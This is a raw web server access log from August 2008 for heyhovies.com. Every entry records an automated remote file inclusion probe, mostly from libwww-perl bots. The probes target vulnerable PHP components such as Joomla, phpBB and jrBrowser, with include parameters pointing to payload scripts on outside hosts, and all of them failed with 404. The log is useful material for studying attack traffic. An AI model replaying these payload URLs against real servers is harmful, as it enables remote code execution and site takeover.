69.89.27.247 - - [21/Aug/2008:06:50:43 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:50:51 -0700] "GET /logs/access_080813.log%20//skin/zero_vote/error.php?dir=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:58 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:53:01 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:53:01 -0700] "GET /logs/access_080804.log///vwar/backup/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:53:01 -0700] "GET ///vwar/backup/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:53:11 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:53:56 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:53:59 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:53:59 -0700] "GET //index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:54:00 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:54:11 -0700] "GET /logs/access_080813.log//index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:54:23 -0700] "GET /logs/access_080731.log%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
200.207.167.157 - - [21/Aug/2008:06:55:32 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.heyhovies.com"
200.207.167.157 - - [21/Aug/2008:06:55:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.heyhovies.com"
217.17.142.173 - - [21/Aug/2008:06:57:11 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://www.caneus.org/d??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
217.17.142.173 - - [21/Aug/2008:06:57:11 -0700] "GET /phphtml.php?htmlclass_path=http://www.caneus.org/d??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
217.17.142.173 - - [21/Aug/2008:06:57:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.caneus.org/d??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
217.17.142.173 - - [21/Aug/2008:06:57:12 -0700] "GET /logs/access_080809.log/phphtml.php?htmlclass_path=http://www.caneus.org/d??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:57:31 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:57:31 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:57:31 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:57:34 -0700] "GET /logs/access_080724.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:58:14 -0700] "GET /logs/access_080724.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:58:14 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:58:14 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:58:17 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
165.166.201.202 - - [21/Aug/2008:06:59:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
165.166.201.202 - - [21/Aug/2008:06:59:30 -0700] "GET /logs/access_080815.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
165.166.201.202 - - [21/Aug/2008:06:59:30 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:02:38 -0700] "GET /logs/access_080809.log//mailaccess/pop3.php?CONFIG[pear_dir]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:02:39 -0700] "GET //mailaccess/pop3.php?CONFIG[pear_dir]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:02:40 -0700] "GET /logs//mailaccess/pop3.php?CONFIG[pear_dir]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:02:50 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:02:53 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:02:53 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:03:31 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:03:31 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:03:42 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:03:59 -0700] "GET /logs/access_080724.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.heyhovies.com"
64.13.225.31 - - [21/Aug/2008:07:04:12 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
64.13.225.31 - - [21/Aug/2008:07:04:13 -0700] "GET //modules/My_eGallery/index.php?basepath=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
64.13.225.31 - - [21/Aug/2008:07:04:13 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:07:04:20 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:07:04:20 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:07:04:20 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:07:05:11 -0700] "GET /error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:05:52 -0700] "GET /logs/access_080815.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:07:06:13 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:07:06:13 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:07:06:13 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:07:06:13 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:07:06:30 -0700] "GET /logs/access_080813.log/error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:07:06:30 -0700] "GET /error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:07:06:31 -0700] "GET /logs/error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
202.181.210.195 - - [21/Aug/2008:07:06:45 -0700] "GET /logs/access.log//phphost_directoryv2/include/admin.php?rd=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
202.181.210.195 - - [21/Aug/2008:07:06:47 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
202.181.210.195 - - [21/Aug/2008:07:06:48 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:07:06:55 -0700] "GET /logs/access_080724.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
80.67.20.130 - - [21/Aug/2008:07:08:24 -0700] "GET /logs/access_080815.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:07:09:05 -0700] "GET /logs/access_080724.log/error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:11:44 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:11:44 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:11:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
165.166.201.202 - - [21/Aug/2008:07:12:06 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
165.166.201.202 - - [21/Aug/2008:07:12:07 -0700] "GET /logs/access_080724.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
165.166.201.202 - - [21/Aug/2008:07:12:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:07:12:35 -0700] "GET /logs/access_080724.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:07:12:41 -0700] "GET /logs/errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:07:12:41 -0700] "GET /errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:07:12:41 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
83.168.219.74 - - [21/Aug/2008:07:13:28 -0700] "GET /logs/access_080813.log/errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
83.168.219.74 - - [21/Aug/2008:07:13:28 -0700] "GET /logs/errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
83.168.219.74 - - [21/Aug/2008:07:13:29 -0700] "GET /errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:07:13:36 -0700] "GET /logs/access_080815.log/errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
83.168.219.74 - - [21/Aug/2008:07:13:48 -0700] "GET /logs/access.log/errors.php?error=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:14:14 -0700] "GET /logs/access_080804.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:15:03 -0700] "GET /logs/access.log/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:15:03 -0700] "GET /errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:15:03 -0700] "GET /logs/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:15:06 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:15:06 -0700] "GET //index.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:15:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:07:16:35 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:07:16:35 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:07:16:35 -0700] "GET //ashnews.php?pathtoashnews=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:07:16:36 -0700] "GET /logs/access_080809.log//ashnews.php?pathtoashnews=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:17:17 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:17:17 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:17:18 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "heyhovies.com"
64.72.112.112 - - [21/Aug/2008:07:18:23 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.heyhovies.com"
64.72.112.112 - - [21/Aug/2008:07:18:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.heyhovies.com"
64.72.112.112 - - [21/Aug/2008:07:18:24 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.heyhovies.com"
190.83.18.253 - - [21/Aug/2008:07:18:44 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
190.83.18.253 - - [21/Aug/2008:07:18:49 -0700] "GET //ashnews.php?pathtoashnews=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
190.83.18.253 - - [21/Aug/2008:07:18:56 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:19:42 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:19:45 -0700] "GET /phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:19:50 -0700] "GET /logs/phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
190.81.184.98 - - [21/Aug/2008:07:20:28 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
190.81.184.98 - - [21/Aug/2008:07:20:28 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
190.81.184.98 - - [21/Aug/2008:07:20:28 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
190.83.18.253 - - [21/Aug/2008:07:21:39 -0700] "GET /logs/access_080809.log//ashnews.php?pathtoashnews=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
